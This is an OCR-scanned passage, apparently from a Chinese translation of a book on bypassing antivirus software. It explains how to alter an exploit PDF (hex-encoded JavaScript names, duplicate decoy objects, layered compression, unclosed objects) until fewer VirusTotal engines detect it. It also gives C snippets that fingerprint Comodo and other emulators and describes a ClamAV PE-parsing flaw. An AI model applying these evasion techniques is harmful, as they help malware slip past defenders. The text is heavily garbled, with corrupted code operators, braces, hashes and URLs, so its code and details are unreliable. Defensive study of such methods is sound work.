PDF 格 式 文件 标准 的 复杂 性 使 得 修改 此 类 格式 恶意 文件 来 绕 过 反 病 毒 软件 的 扫描 变 得 十 分 
容易 。 让 我 们 来 进行 一 次 实验 , 使 用 SHA1 散 列 值 为 88b6a40a8aa0p8a6q515722d9801f8fb7- 
d332482 的 样本 ，VirusTotal 的 扫描 结果 参见 网 址 : https://www.virustotal.com/file/05d44f5a3- 
fd6ab442f64d6b20e35af77f8720ec47b0ce48f437481cbda7cdbad/analysis/。 可 以 看 到 多 引擎 扫描 结果 
为 ， 在 75 款 扫描 引擎 中 ， 有 25 款 检测 出 了 恶意 软件 。 

接 下 来 学 习 如 何 使 用 相关 技巧 修改 PDF 文 件 ， 从 而 减少 能 通过 特征 码 匹 配 的 方式 ,检测 出 此 
漏洞 利用 攻击 程序 的 反 病毒 引擎 的 数量 。 正 如 你 所 想 的 那样 ,此 处 使 用 的 漏洞 利用 攻击 程序 用 到 
了 JavaScript 人 代码。 通过 /Js 或 /JavaSscript 标 签 ， 可 以 在 PDF 文 件 中 航 入 JavaScript 对 象 。Js 或 
Javascript 的 名 称 可 以 通过 ASCI 字 符 或 十 六 进 制 字 符 形式 进行 编码 。 例 如， 可 以 将 字符 a 转化 
成 十 六 进 制 表现 形式 ， 即 以 # 符 号 作为 开头 的 字符 编码 。 经 过 编码 处 理 后 ， 原 先 的 /Javascript 
会 变 成 /J#61v#61Script。 当 然 ， 你 也 可 以 对 整个 Javascript 字 符 捉 进行 同样 的 操作 。 

将 所 有 /Javascript 字 符 串 赫 换 成 /#4a#61#76#61#53#63#72#69#70#74，, 保存 并 生成 新 
的 样本 , 接着 上 传 至 VirusTotal 平 台 上 。 新 的 多 引擎 扫描 报告 结果 如 下 : https://www.virustotal.com/ 
file/2d77e38a3ecf90953876244155273658c03dba52aa56aa17140d8d6ad6160173a0/analysis/ ; 

我 们 注意 到 ， 上 面 的 VirusTotal 扫 描 报 告 显示 ， 上 述 绕 过 方法 似乎 对 一 款 之 前 没有 提 到 的 新 
反 病 毒 产 品 DrWeb 无 效 ， 它 成 功 检测 出 了 修改 过 的 PDF 恶意 软件 样本 。 在 现实 生活 中 ， 这 种 情况 
时 有 发 生 , 使 用 某 一 技巧 修改 样本 后 , 它 在 绕 过 一 款 反 病毒 产品 的 同时 可 能 又 会 被 另 一 款 新 的 反 
病毒 软件 侦 测 出 来 。 现 在 ， 让 我 们 撤销 之 前 对 PDF 漏洞 利用 攻击 程序 所 做 的 改动 ,对 原始 样本 应 
用 新 的 绕 过 技巧 : 对 象 混 淆 。 在 PDF 文件 中 ， 对 象 的 形式 如 下 : 

1 0 obj ««/Filter /FlateDecode >> 

Mc 


endstream 
endobj 





































































































2 0 obj 


endobj 
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上 述 例 子 中 有 两 个 对 象 数 字 ( 1 或 2 )、 修 正 数 字 ( 此 处 两 个 修正 数字 都 是 0 )， 以 及 作用 在 << 
和 >> 字 符 之 间 的 对 象 数据 上 的 一 系列 过 滤 需 。 接 着 是 用 于 表示 接 下 来 的 数据 都 是 对 象 数据 的 流标 
签 。 标 签 以 endstream 和 endobj 结 束 ， 紧 接着 是 新 的 对 象 。 让 我 们 设想 一 下 ， 如 果 有 重复 数字 
的 对 象 ( 比如 ， 两 个 带 有 相同 对 象 数 字 的 对 象 )， 会 发 生 什么 ”这 种 情况 下 ,会 选用 最 后 一 个 对 
象 ， 而 前 一 个 相同 的 对 象 会 被 丢弃 。 那 反 病 毒 软 件 有 没有 注意 到 PDF 格式 文件 的 这 项 特性 呢 ? 为 
了 一 探究 竟 ， 我 们 创建 一 个 带 有 对 象 数字 66 的 仿制 PDF 对 象 。 接 着 在 真实 的 对 象 前 ， 创 建 另 一 个 
带 有 相同 数字 和 修订 版 本 的 伪造 对 象 。 在 66 0 obj 行 前 插入 数据 块 ， 效 果 如 下 : 


66 0 obj 

<</Filter /AsciiHexDecode /FlateDecode /FlateDecode /FlateDecode 
/FlateDecode >> 

stream 






































789cab98f3f68e629e708144fbc3facd9c46865d0e896a139c13b36635382ab7c55930c8 
6d57e59ec79c7071c5afb385cdb979ec0a2d13585dc32e79d55c5ef2fef39c0797f7d754d 
ad7fd 
2c3498d896378cedebee6f7cf17090c4060£deecfb7a47c53b69ecb54fbfcedefele288210 
fbfddfc787ffaa447e54ff7af3755b3f£2350ccecdde51ab3887a8e3£76bf£37ec7£9b0c52 
d55bfd 
ebf9bbab55dc3ff6c5d858defc660a143b70ec2e071509076e802155805c2e906738e2073 
4665a826e5333£7fcbcf5dblab5efe2dfaf8a98281elcff34f47d71baafd67609ceebb1700 
153f9a 

9d 


endstream 
endobj 


66 0 obj 

(ENS 

添加 伪造 对 象 后 〈 结合 另 一 个 将 会 在 下 面 提 到 的 技巧 )， 将 PDF 文件 样本 重新 上 传 一 次 
VirusTotal ， 查 看 结果 : https//www.virustotal.com/file/e43f3f060e82af85b99743e68da59ff555dd2d02f- 
2af83ecac84f773b41f3ca7/analysis/1422360906/ 

非常 棒 ! 现在 的 57 款 反 病 毒 引 擎 中 ， 有 15 款 可 以 侦 测 到 这 个 PDF 样本 。 这 是 因为 反 病毒 软件 
没有 考虑 到 PDF 中 的 对 象 可 以 重复 , 或 者 因为 我 们 在 这 里 使 用 了 另 一 个 技巧 。 这 个 技巧 就 是 , PDF 
文件 中 的 流 数据 可 以 被 压缩 并 编码 。 在 本 例 中 ， 添 加 的 伪造 对 象 是 经 过 多 次 压缩 ( /Flate- 
Decode ) 并 以 十 六 进 制 编码 的 ( /AsciiHexDecogde )。 当 对 象 解密 并 解压 缩 时 ， 会 消耗 256 MB 
的 RAM。 如 果 再 使 用 一 次 之 前 的 技巧 (十 六 进 制 编码 )， 这 次 或 许 就 有 效 了 : https://www. 
virustotal.com/file/e43f3f060e82af85b99743e68da59ff555dd2d02f2af83ecac84f773b41f3ca7/analysis/ 
1422360906/, 

侦 测 率 下 降 至 57 款 反 病 毒 引 擎 中 只 有 14 款 侦 测 到 了 样本 。 有 时 一 些 绕 过 反 病 毒 软件 的 技巧 不 
会 单独 生效 , 但 经 过 多 次 变动 后 就 可 以 绕 过 不 止 一 款 反 病 毒 软 件 了 。 这 在 探究 绕 过 反 病 毒 软件 方 
式 的 过 程 中 值得 反复 尝试 。 

现在 让 我 们 再 尝试 使 用 之 前 的 技巧 , 并 添加 新 的 重复 对 象 集合 。 对 象 数字 70 指 向 的 JavaScript 
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/JS 67 0 R 

/S /JavaScript 
>> 

endobj 


该 对 象 指向 另 一 个 包含 真实 JavaScript 内 容 〈 /JS 67) 的 对 象 。 现 在 让 我 们 在 真实 的 对 象 70 
之 前 复制 创建 一 份 新 的 对 象 70， 来 绕 过 反 病 毒 软件 的 侦 测 ， 接 着 将 编辑 完成 的 样本 文件 上 传 至 
VirusTotal 扫 描 : https://www.virustotal.com/file/b62496e6af449e4bcf834bf3e33fece39f5c04e47fc680- 
f8f67db4af86f807cS/analysis/1422361191/。 

检测 出 样本 文件 的 反 病毒 软件 数量 再 次 下 降 : 57 款 反 病 毒 软件 中 只 有 13 款 能 够 检测 出 样本 。 
现在 来 尝试 一 下 另 一 项 更 为 核心 的 技巧 。 还 记得 PDF 文件 中 的 对 象 和 多 媒体 流 吗 ? Adobe Acrobat 
的 解析 器 并 没有 强制 要 求 对 象 和 数据 流标 签 闭 合 。 找 到 刚刚 添加 的 仿造 对 象 数字 66， 接 着 移 除 
endstream 和 endqobj， 并 上 传 至 VirusTotal 进 行 扫描 检测 。 这 次 结果 下 降 至 只 有 3 款 反 病毒 软件 
可 以 检测 出 PDF 恶意 软件 样本 了 : https//www.virustotal.com/file/4f431ef4822408888388acbcdd- 
44554bd02734d521f41a9e9e228d3ba28355a36/analysis/1422363730/ , 

又 是 一 个 很 棒 的 技巧 ! 更 为 重要 的 是 ， 由 于 在 研究 绕 过 反 病 毒 软件 的 侦 测 过 程 中 主要 基于 
Adobe PDF 解 析 的 工作 方式 开展 ， 授 和 PDF 文件 中 的 漏洞 利用 攻击 程序 的 相关 功能 并 没有 受到 任 
何 影响 。 如 果 基 于 其 他 PDF 阅读 软件 进行 研究 ， 结 果 可 能 会 大 不 相同 。 


















































7.4 i 











本 章 围 绕 通 用 情况 以 及 若干 特殊 文件 格式 , 讨论 了 绕 过 特征 码 病 毒 扫描 的 方式 。 此 外 ,我 们 
还 动手 实践 了 许多 绕 过 特征 码 扫 描 的 例子 , 并 探讨 了 如 何 绕 过 针对 PE、JavaScript 和 PDF 样 本 文件 
的 特征 码 扫 描 。 

口 编写 针对 不 同文 件 格式 的 解析 程序 困难 又 乏味 。 如 果 相 关 文 件 格式 没有 官方 规范 说 明文 

档 ， 攻 击 者 只 能 进行 逆向 分 析 。 当 然 ， 这 同时 也 意味 着 ,针对 复杂 的 文件 格式 编写 一 个 

毫 无 缺陷 的 解析 絮 是 不 可 能 的 事情 。 

a 要 想 绕 过 基于 特征 码 的 侦 测 ， 可 以 系统 展开 或 选用 类 似 模糊 测试 的 方法 。 当 你 准备 系统 

地 研究 绕 过 基于 特征 码 的 恶意 软件 侦 测 时 ， 首 先 需 要 回答 三 个 问题 : 病毒 标识 特征 数据 

库 在 什么 位 置 ? 病毒 标识 特征 数据 库 的 文件 格式 是 什么 ”针对 特定 样本 的 扫描 特征 信息 

是 如 何 编 码 并 存储 在 特征 库 文件 中 的 ”找到 这 三 个 问题 的 答案 以 后 ， 尝 试 找 出 反 病毒 软 

件 在 侦 测 对 应 恶意 软件 样本 时 尝试 匹配 的 特征 ， 并 根据 匹配 特征 对 样本 进行 修改 。 通 过 

类 似 模 糊 测试 的 随机 测试 研究 方式 ， 找 到 绕 过 特征 码 扫 描 的 具体 过 程 已 经 在 前 面 一 章 中 

有 过 讨论 。 其 核心 是 ， 在 不 影响 样本 文件 执行 的 前 提 下 ， 不 停 修 改 恶 意 样 本 文件 ， 直 到 
反 病 毒 软件 不 再 查 杀 样本 。 
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O 反 病 毒 产品 支持 许多 文件 格式 的 扫描 查 杀 。 如 果 想 让 不 同 格式 的 文件 绕 过 反 病 毒 软 件 的 

扫描 ， 你 需要 研究 如 何 修 改 对 应 的 文件 格式 来 绕 过 侦 测 。 

O PE 文件 格式 有 许多 通信 式 结构 。 这 些 结构 中 的 许多 区 域 对 于 PE 文件 在 操作 系统 上 的 执行 
并 不 十 分 重要 ， 比 如 PE 文件 的 时 间 戳 。 一 些 反 病毒 软件 会 将 这 些 非 必需 的 PE 文件 区 域 结 
构 值 作为 查 杀 特征 。 因 此 ， 修 改 这 类 区 域 可 以 使 样本 绕 过 反 病 毒 软件 的 扫描 。 

口 JavaScript 用 于 编写 基于 网 络 的 漏洞 攻击 利用 程序 。 由 于 JavaScript 代 码 十 分 灵活 多 变 ， 攻 

击 者 可 以 通过 代码 混淆 来 隐藏 漏洞 攻击 利用 程序 的 真实 逻辑 ， 并 绕 过 侦 测 。 

O PDF 文件 是 一 种 通用 文档 格式 。 在 不 同 的 操作 系统 中 ,PDF 文件 都 可 以 被 独立 、 无 颖 地 打 
FERo FIEt, PDF 文件 格式 的 规范 庞大 元 杂 。 这 对 于 攻击 者 来 说 是 一 大 福音 ， 因 为 可 以 
使 用 各 式 各 样 的 技巧 来 将 漏洞 攻击 利用 程序 隐藏 在 PDF 文 件 中 ， 并 绕 过 反 病 毒 软件 的 侦 
Mo 比如, 对 内 置 在 PDF 文件 中 的 JavaScript 代 码 进行 编码 , 使 用 多 余 的 stream id 、 压 缩 流 ， 
以 及 编码 器 或 压缩 器 对 PDF 文 件 进行 多 次 处 理 ， 等 等 。 

下 一 章 将 讨论 如 何 绕 过 基于 非特 征 码 查 杀 技术 的 反 病毒 扫描 右 。 






















































































ext bOpi ied Mi as DELE AE T REGE RIBUS bp Sed- H8 Pr], 因为 前 者 事实 上 不 是 绕 过 针对 
特定 文件 格式 的 病毒 侦 测 特征 码 〈 前 一 章 已 有 所 提 及 )， 而 是 绕 过 反 病 毒 引 擎 。 

可 以 说 , 反 病 毒 扫 描 器 是 反 病 毒 支 撑 系 统 中 最 核心 的 部 分 。 除 了 完成 许多 其 他 任务 外 ,， 它 还 
负责 针对 要 分 析 的 文件 进行 通用 扫描 和 特征 码 扫 描 。 这 么 一 来 , 要 绕 过 反 病 毒 引擎 就 意味 着 要 绕 
过 整个 病毒 特征 码 库 、 扫 描 引 苟 和 侦 测 逻辑 。 本 章 将 阐释 如 何 绕 过 静态 扫描 融 ( 主要 扫描 硬盘 上 
的 文件 ) 和 动态 扫描 絮 ( 主要 分 析 程 序 行 为 和 内 存 )。 
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绕 过 扫描 器 有 一 些 通用 的 要 诀 和 技巧 可 供 参 考 使 用 。 比 如 , 许多 扫描 分 析 程 序 不 会 扫描 大 文 
件 。 尽管 这 对 扫描 过 程 中 性 能 消耗 情况 改进 效果 甚 微 , 但 是 仍然 很 重要 , 尤其 是 谈论 到 反 病 毒 软 
件 的 桌面 终端 版 本 时 ， 因 为 扫描 器 需要 在 保证 速度 的 情况 下 ， 又 不 能 降低 操作 系统 的 运行 速度 。 
正 是 因为 这 一 特性 , 我 们 可 以 将 恶意 软件 的 大 小 修改 成 超过 设置 设 定好 的 跳 过 扫描 的 最 大 文件 大 
小 值 。 一般 基于 静态 数据 ( 从 可 执行 程序 或 PE 文件 以 及 文件 头 中 提取 出 的 相关 数据 ) 分 析 的 启发 
式 扫描 引擎 , 会 倾向 于 对 竺 扫描 文件 的 大 小 有 筛选 限制 。 另 外 我 们 还 需要 关注 一 点 , 通常 情况 下 ， 
扫描 需 或 反 病 毒 引擎 在 处 理 一 些 特 殊 格 式 的 文件 时 , 可 能 无 法 正常 解析 C 比如 , 损坏 的 PE 文件 ), 
这 会 使 得 扫描 器 或 反 病 毒 引 擎 跳 过 当前 或 所 有 PE 文件 的 扫描 ,不 过 反 病 毒 软件 仍然 会 对 相关 文件 
样本 进行 基于 循环 元 余 检查 (cyclic redundancy check, CRC ) 的 特征 码 扫 描 C 比如 ， 匹 配 扫 描 某 
些 偏 移 量 的 CRC 值 )。 本 章 稍 后 将 会 使 用 相关 样本 案例 对 此 进行 前 释 。 

除了 在 反 病 毒 引 警 解 析 不 同 格式 文件 的 过 程 中 设置 困难 外 , 也 可 以 尝试 欺骗 反 病 毒 软件 的 相 
关 函 数 和 支持 库 。 最 典型 的 核心 支持 函数 存在 于 反 病 毒 软件 的 模拟 器 和 反 汇 编 模 块 中 。 据 我 所 知 ， 
除了 ClamAV 外 ， 几 乎 所 有 反 病 毒 引 擎 都 带 有 针对 Intel 8086 架 构 设 计 的 模拟 器 以 及 针对 Intel x86 
架构 设计 的 反 汇 编 模块 。 能 和 否 通过 攻击 反 汇 编 模块 或 模拟 器 来 影响 或 绕 过 反 病 毒 扫 撒 器 呢 ? 许多 
文件 侦 测 分 析 程序 都 依赖 从 模拟 器 和 反 汇 编 模 块 收集 上 来 的 相关 证 据 和 恶意 软件 行为 信息 。 如 果 
可 以 在 模拟 器 中 执行 非法 指令 , 或 者 在 反 汇 编 引 擎 中 执行 合法 但 未 支持 或 不 正确 的 指令 , 你 将 会 
在 大 部 分 反 病 毒 扫 描 器 上 得 到 如 下 结果 : 由 于 反 病 毒 引 擎 的 支持 函数 存在 缺陷 , 分 析 程 序 无 法 反 
汇编 分 析 样本 文件 。 
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接 下 来 的 几 节 将 会 探讨 更 多 可 以 用 于 绕 过 扫描 器 的 技巧 。 
8.1.1 识别 分 析 模 拟 器 


最 常见 的 绕 过 技术 之 一 是 识别 模拟 器 。 由 于 带 有 多 态 或 变形 的 代码 , 恶意 样本 文件 通常 很 容 
易 被 反 病毒 软件 归 类 为 待 模拟 分 析 的 对 象 。 因 为 编写 出 一 个 复杂 且 万 无 一 失 的 静态 分 析 引 擎 基本 
不 可 能 ,所 以 反 病 毒 软件 使 用 静态 分 析 引 擎 其 实 远 远 不 够 。 在 识别 反 病 毒 引 擎 使 用 的 模拟 器 之 前 ， 
要 提醒 大 家 注意 一 个 事实 : 反 病 毒 软件 的 模拟 器 不 会 准确 或 完整 地 模拟 整个 操作 系统 ,而 是 模拟 
最 常 被 调用 的 函数 。 许 多 情况 下 , 你 都 可 以 认为 系统 函数 都 由 这 些 函 数 的 存根 代码 来 实现 ,它们 
通常 都 返回 硬 编码 的 值 。 下 面 将 会 以 Comodo antivirus Linux 版 的 模拟 器 为 案例 进行 分 析 。 如 果 使 
用 IDA 打 开 libMACH32.so 库 (此 处 有 完整 的 调试 符号 ， 这 对 反 汇 编 分 析 十 分 有 帮助 )， 会 得 到 如 
下 函数 结果 : 
































.text:000000000018B93A ; PRUint32 | cdecl Emu, OpenMutexW 

(void *pVMClass) 

.ctext:000000000018B93A public , Z14Emu, OpenMutexWPv 
.text:000000000018B93A .Z14Emu OpenMutexWPv proc near 


; DATA XREF: .data:kernel32ApiInf 
.ctext:000000000018B93A pVMClass - rdi 
; void * 
.text:000000000018B93A mov eax, OBBBBh 
.text:000000000018B93F retn 

.text:000000000018B93F .Z14Emu OpenMutexWPv endp 
t:000000000018B93F 

.text:000000000018B93F 


上 述 代码 与 被 模拟 的 kernel32 函 数 openMutexW 一 致 。 这 个 函数 通常 会 返回 麻 法 值 0xBBBB。 
OpenMutexW 返 回 这 个 值 的 概率 十 分 小 。 除 非 在 Comodo matrix 内 ， 和 否则 调用 这 个 函数 并 返回 相同 
值 两 次 的 概率 几乎 可 以 小 到 不 计 。 可 以 使 用 C 编 写 一 些 人 代码， 来 识别 Comodo 的 模拟 器 : 


#define MAGIC MUTEX OxBBBB 

















void is comodo matrix(void) 
{ 
HANDLE ret = OpenMutex(0, false, NULL); 


if ( ret -- MAGIC MUTEX && 
OpenMutex(NULL, false, NULL) -- MAGIC MUTEX ) 
{ 
MessageBox(0, "Hi Comodo antivirus!", "Comodo's Matrix", 0); 
) 
else 


{ 
// Do real stuff here... 
) 
} 


可 以 使 用 下 面 的 一 些 技巧 ， 来 确保 编写 的 C 代 码 在 Comodo 模 拟 需 内 执行 。 在 另 一 个 例子 中 ， 
让 我 们 来 看 一 下 与 kerne132!ConnectNamedPipe 对 应 的 困 数 Emu_connectNamedPipe: 








A 
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.text:000000000018B8E8 ; PRUint32 _ cdecl Emu ConnectNamedPipe 
(void *pVMClass) 
.text:000000000018B8bE8 public . Z20Emu, ConnectNamedPipePv 
.text:000000000018B8E8 | Z20Emu ConnectNamedPipePv proc near 

; DATA XREF: .data:kernel32ApiInf 


.text:000000000018B8bE8 pVMClass = rdi ; void * 
.text:000000000018B8E8 mov eax, 1 
text:000000000018B8bED retn 











.text:000000000018B8ED . Z20Emu, ConnectNamedPipePv endp 

上 述 桩 代码 的 返回 值 总 是 true( 即 值 为 1 )。 现 在 我 们 可 以 通过 调用 kerne132 :connect- 
NamedPipe 传 人 使 模拟 器 无 法 正常 工作 的 参数 , 来 测试 模拟 器 的 存在 。 在 本 例 中 ,函数 总 是 返回 
RI, 这 是 存在 模拟 器 的 指示 。 但 是 ,这 项 反 模 拟 器 技巧 的 应 用 不 仅仅 局 限于 在 Comodo antivirus 
上 使 用 。 通 用 技巧 对 于 许多 反 病毒 产品 都 起 作用 ， 所 以 相对 来 说 更 好 。 但 攻击 者 有 时 候 出 于 各 种 
原因 ,可 能 只 需要 识别 分 析 一 球 模拟 器 : 可 能 只 想 针对 一 款 反 病毒 软件 进行 绕 过 , 或 者 只 想 利用 
漏洞 针对 某 一 特定 的 反 病 毒 软件 开展 攻击 。 如 果 掌 握 了 Comodo antivirus 在 扫描 特定 文件 格式 时 
的 漏洞 ， 就 可 以 借助 模拟 器 识别 分 析 ， 确 定 当前 扫描 的 反 病 毒 软件 是 Comodo antivirus ， 接 着 解 
包 特 定 的 文件 或 缓冲 区 ， 利 用 Comodo 的 漏洞 进行 攻击 。 同 时 ， 如 果 识别 到 无 法 利用 相关 漏洞 的 
其 他 反 病 毒 软件 ， 则 隐藏 相关 攻击 逻辑 。 









































8.1.2 ”高 级 绕 过 技巧 


本 节 曾 释 如 何 使 用 相关 技巧 绕 过 多 款 反 病毒 扫描 右 。 大 部 分 技巧 都 是 通用 的 , 而 且 现 在 仍然 
有 效 。 但 是 ,一 旦 将 这 些 绕 过 技巧 公之于众 ， 就 会 很 快 被 反 病毒 厂商 修复 。 

1. 利用 文件 格式 的 弱点 

第 7 章 探 讨 了 如 果 绕 过 针对 一 些 文件 格式 ( 如 PE 文件 和 PDF 文件 ) 的 特征 码 扫描 检测 。 但 是 ， 
与 之 前 介绍 的 绕 过 针对 单个 文件 或 文件 集合 的 单条 特征 码 不 同 , 接 下 来 将 会 介绍 使 用 更 为 复杂 的 
方式 绕 过 整个 PE 解析 模块 。 下 面 将 以 ClamAV 的 PE 文件 解析 模块 作为 研究 对 象 。int 
cli scanpe(cli, ctx *ctx) 程 序 中 的 libclamscan/pe.c 文 件 包 含 以 下 代码 : 


5s) 
nsections = EC16 (file hdr.NumberOfSections); 
if(nsections < 1 || nsections > 96) { 
#if HAVE_JSON 
pe add heuristic property (ctx, "BadNumberOfSections"); 

















#endif 

if(DETECT BROKEN PE) ( 
cli append virus(ctx,"Heuristics.Broken.Executable"); 
return CL VIRUS; 

j 

if(!ctx-»corrupted input) ( 
if(nsections) 
cli warnmsg("PE file contains $d sectionsWMn", nsections); 
else 
cli warnmsg("PE file contains no sections Mn"); 
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return CL CLEAN; 
} 
cli dbgmsg("NumberOfSections: %d\n", nsections); 


人 

上 述 代码 片段 用 于 显示 已 检测 的 PE 文件 的 区 块 数 量 ， 其 逻辑 为 : 如 果 文 件 区 块 为 0 或 区 块 数 
量 大 于 96, 则 认为 PE 文件 已 经 损坏 。Heuristics.Broken.Executable 侦 测 功能 默认 处 于 禁用 
状态 (这 是 因为 DETECT_BROKEN_PE C 的 定义 值 将 其 设置 成 了 禁用 状态 )。 因 此 ， 针 对 区 块 数量 
为 0 或 大 于 9%6 的 文件 ，ClamAvV 扫 描 器 将 会 返回 cL_cLEAN。 这 样 的 检测 逻辑 是 不 正确 的 。 在 
Windows XP 及 更 低 版 本 的 Windows 操 作 系统 上 ， 区 块 超过 96 的 PE 文件 无 法 执行 。 但 从 Windows 
Vista 开 始 ，PE 文 件 的 最 高 区 块 数量 可 以 是 65 535。 另 外 ，PE 文 件 可 以 不 包含 任何 区 块 : 低 对 齐 
因子 的 PE 文件 ，IMAGE_FILE_HEADER 中 的 NumberOfSections 值 可 以 为 NULL。 可 以 使 用 这 项 
技巧 (是 从 Corkami 项 目 页 面 中 有 关 PE 的 技巧 中 提取 的 ) 绕 过 的 所 有 针对 PE 文件 的 ClamAV 检 测 
程序 。 这 是 因为 ，ClamAV 进 行 的 这 些 检测 是 在 实际 和 运行 解压 缩 或 侦 测 程序 之 前 进行 的 。 

2. 使 用 反 模 拟 器 技巧 

反 模 拟 技 巧 是 指 绕 过 欺骗 一 款 或 多 款 反 病毒 软件 的 模拟 器 的 技巧 。 目前 市 场 上 有 许多 种 类 的 
模拟 器 ， 有 Intel x86 模 拟 器 ， 也 有 模拟 JavaScript 的 解释 器 ， 还 有 针对 Intel x86 64、.NET、ARM 
等 的 模拟 需 。 之 前 例子 中 提 到 的 识别 分 析 一 款 模拟 需 其 实 是 一 项 反 模 拟 技巧 。 本 节 将 曾 释 多 种 针 
对 Windows PE 文件 、x86 程 序 、 用 于 支持 PDF 文 件 的 Adobe Acrobat JavaScript 解 释 器 的 通用 反 模 拟 
器 技巧 。 

@ 进行 API 模 拟 

最 常见 的 反 模 拟 顺 技巧 是 ， 使 用 未 有 说 明文 档 或 不 常见 的 系统 API， 如 SetErrorMoae: 


DWORD dwCode = 1024; 






















































































SetErrorMode (1024); 
if (SetErrorMode(0) !- 1024) 
printf("Hi emulator!Nn"); 


上 述 代码 调用 setErrorMode 并 向 其 传递 了 一 个 参数 值 1024， 接 着 再 次 调用 setError- 
Mode, 同时 传人 另外 一 个 值 。 SetErrorMode 返 回 的 值 一 定 会 是 之 前 调用 的 那个 值 。 模拟 器 仅仅 
TfSetErrorModePRZIC A E — TPBEBRUT , 会 执行 错误 的 行为 并 返回 错误 的 值 。 在 很 长 一 段 时 期 内 ， 
这 项 反 模拟 器 技巧 对 不 少 模拟 器 都 有 效 ， 比 如 Norman SandBox。 

另 一 项 典型 的 技巧 是 使 用 会 被 错误 执行 的 API 模 拟 函 数 。 比 如 , 如 果 向 某 一 API 传 递 一 个 NULL 
参数 值 ， 在 非 模拟 系统 环境 下 ， 将 会 触发 一 个 “access violation exception” 错 误 。 从 另 一 方面 来 
说 ， 调 用 某 一 API 并 传递 NuLL 参 数值 ， 这 一 API 也 有 可 能 会 返回 0 以 表示 执行 错误 。 另 一 项 技巧 是 
加 载 一 个 模拟 器 不 支持 的 系统 核心 库 , 然后 调用 一 个 导出 的 函数 。 目 前 几乎 任何 一 球 模 拟 需 都 无 
法 调用 类 似 的 系统 核心 库 : 

int test6 (void) 


HANDLE hProc; 
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hProc = LoadLibrary("ntoskrnl.exe"); 


if (hProc -- NULL) 
return EMULATOR, DETECTED; 
else 
return EMULATOR NOT DETECTED; 
) 


上 述 案 例 中 的 代码 尝试 加 载 Windows 操 作 系 统 的 核心 部 分 一 一 NT 内 核 , 但 是 如 果 对 应 的 反 病 
毒 模拟 器 比较 简单 ， 将 无 法 调用 ntoskrnl.exe 文 件 ， 因 为 它 不 是 常见 的 用 户 态 组 成 部 分 。 如 果 目 标 
模拟 器 允许 调用 任何 一 个 返回 伪 句 柄 的 库 , 可 以 通过 下 面 这 种 更 加 复杂 的 方式 , 来 确定 在 模拟 器 
中 ， 响 应 函数 是 否 和 预期 的 行为 一 致 : 

struct datal 

{ 

int a1; 


int a2; 
Js 











struct data2 
{ 

int a1; 

int a2; 

int a3; 

int a4; 

int a5; 

int a6; 

struct datal *a7; 
13 


typedef int (WINAPI *FCcSetReadAheadGranularity) (struct data2 *al, 
int num); 
typedef int (WINAPI *FIofCallDriver)(); 


int test8 (void) 


{ 
HINSTANCE hProc; 
FIofCallDriver pIofCallDriver; 


hProc - LoadLibrary("ntkrnlpa.exe"); 


if (hProc -- NULL) 
return 0; 
pIofCallDriver = (FIofCallDriver)GetProcAddress (hProc,"IofCallDriver"); 
plofCallDriver -= 2; // At this point there are 2 0xCC characters, 
//so an INT3 should be raised 
try 


( 
profCallDriver(); 


return EMULATOR DETECTED; 
j 
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catch(..) 

( 

return EMULATOR NOT DETECTED; 
) 


j 

上 例 加 载 了 二 进 制 文件 ntkrmlpa.exe， 获 取 函 数 IofcaLlLDrivez 的 地 址 ， 接 着 跳 至 该 函数 前 
两 个 字 节 处。 在 一 般 非 模拟 的 Windows 操 作 系 统 中 ， 类 似 包 含 0xcc 对 齐 字 节 的 代码 会 被 作为 INT 
3 指令 解析 ， 进 入 某 一 内 存 区 域 中 。 造 成 在 真实 操作 系统 中 ， 函 数 调用 在 某 一 断 点 处 出 错 。 但 对 
反 病 毒 软件 模拟 的 操作 系统 来 说 ， 上 述 代码 运行 不 会 产生 错误 。 
再 举 男 外 一 个 例子 : 
int test9 (void) 
— hProc; 
FCcSetReadAheadGranularity CcSetReadAheadGranularity; 
struct datal s1; 


struct data2 s2; 
int ret; 




















hProc - LoadLibrary("ntkrnlpa.exe"); 





if (hProc -- NULL) 
return 0; 


CcSetReadAheadGranularity - (FCcSetReadAheadGranularity)GetProcAddress( 
hProc, "CcSetReadAheadGranularity"); 


if (CcSetReadAheadGranularity -- NULL) 
return 0; 


S1.a2 
S2.a7 


0; 
&s1; 


// After this call, ret must be 0x666, the given 2nd argument 
// minus 1 
ret - CcSetReadAheadGranularity(&s2, 0x667); 


if (ret !- 0x666) 

return EMULATOR, DETECTED; 
else 
return EMULATOR, NOT DETECTED; 





) 

上 述 代 码 调用 了 一 个 函数 ， 该 函数 接受 了 一 个 结构 体 (名 为 aatal ) 和 一 个 值 (本 例 中 该 值 
为 0x667 )。 基 于 该 函数 的 性 质 ， 第 二 个 参数 传人 的 值 会 减少 ， 并 被 函数 作为 返回 值 返 回 。 但 是 
当 反 病毒 软件 模拟 器 执行 这 一 函数 时 仅 会 返回 0 或 1, 这 让 我 们 的 样本 程序 有 能 力 判 断 当 前 是 否 运 
行 在 matrix 模 拟 器 中 。 


" 
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e 借助 旧 特 性 

在 MS-DOS 和 Windows 9x 时 期 ,可 以 用 AUX、CON 等 其 他 特殊 方法 来 从 键盘 读 取 信息 ,改变 
terminal 的 颜色 。 该 行为 在 目前 真实 的 Microsoft Windows 操 作 系 统 中 仍然 存在 ， 但 在 模拟 器 中 没 
有 。 接 下 来 是 一 个 简单 的 例子 : 

















FILE *f; 
f = -fopen("o:XXeonm", "Up" 
if (f == NULL) 
return EMULATOR, DETECTED; 
else 


return EMULATOR NOT DETECTED; 

上 述 代码 用 于 打开 C:con。 这 项 操作 在 真实 的 Windows 平 台 ( JA Windows 9558 Windows 8.1 ) 
都 可 行 ， 但 对 于 模拟 器 来 说 不 支持 这 一 功能 特性 。 总 而 言 之 ,该 技巧 只 适用 于 最 新 的 模拟 器 : 从 
Windows 9X 开 始 就 有 的 模拟 器 可 以 支持 包括 这 一 特性 在 内 的 其 他 旧 功 能 ， 因 为 按照 一 般 规 律 来 
说 ， 反 病毒 引擎 不 会 移 除 旧 的 代码 。 

e 模拟 CPU 指令 

正确 模拟 完整 的 CPU 十 分 困难 , 而 且 在 寻找 不 一 致 的 地 方 时 非常 容易 出 错 。Norman SandBox 
就 曾经 在 模拟 CPU 指令 的 实现 过 程 中 表现 得 十 分 糟糕 : Norman 反 病毒 模拟 器 常常 因为 接收 到 
ICEBP 或 UD2 指 令 而 月 省 ;另外 ， 它 还 允许 在 模拟 器 内 通过 特权 指令 ， 使 用 户 态 程序 更 改 调 试 注 
册 表 内 容 , 这 在 真实 的 操作 系统 下 是 完全 被 禁止 的 .可 以 通过 下 面 这 段 代 码 , 重 现 Norman SandBox 
的 这 一 缺陷 : 

